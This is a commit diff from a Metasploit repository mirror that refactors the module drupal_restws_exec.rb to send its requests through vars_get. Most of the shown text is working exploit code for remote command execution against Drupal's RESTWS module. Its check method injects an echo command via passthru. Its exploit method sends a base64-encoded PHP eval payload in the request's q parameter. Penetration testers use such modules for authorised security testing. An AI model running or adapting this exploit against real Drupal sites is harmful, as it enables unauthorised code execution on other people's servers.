adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Use vars_get un send_request_cgi

Browse Source
This commit is contained in:
Mehmet Ince
2016-07-19 20:12:14 +03:00
parent ec2f8fcc71
commit 9c8e351ba8
1 changed files with 9 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/unix/webapp/drupal_restws_exec.rb
+9 -9
View File
@@ -53,10 +53,12 @@ class MetasploitModule < Msf::Exploit::Remote
def check
r = rand_text_alpha(8 + rand(4))
url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
res = send_request_cgi(
'method' => 'GET',
'uri' => url
'uri' => normalize_uri(target_uri.path, "index.php"),
'vars_get' => {
'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
}
)
if res && res.body =~ /#{r}/
return Exploit::CheckCode::Appears
@@ -66,15 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
random = rand_text_alpha(1 + rand(2))
url = normalize_uri(target_uri.path,
"?q=taxonomy_vocabulary/",
random ,
"/passthru/",
Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
)
cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
send_request_cgi(
'method' => 'GET',
'uri' => url
'uri' => normalize_uri(target_uri.path, "index.php"),
'vars_get' => {
'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
}
)
end
end